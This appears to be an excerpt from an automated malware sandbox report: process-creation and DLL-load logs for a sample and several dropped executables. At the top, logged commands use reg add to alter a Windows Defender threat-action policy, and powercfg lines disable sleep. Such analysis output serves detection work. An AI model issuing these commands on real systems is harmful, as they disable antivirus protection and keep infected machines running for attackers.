Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: gpedit.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: dssec.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: dsuiext.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fhsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msidle.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fhcfg.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: efsutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncasvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: httpprxp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wpdbusenum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceconnectapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: amsi.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Section loaded: mscorjit.dll
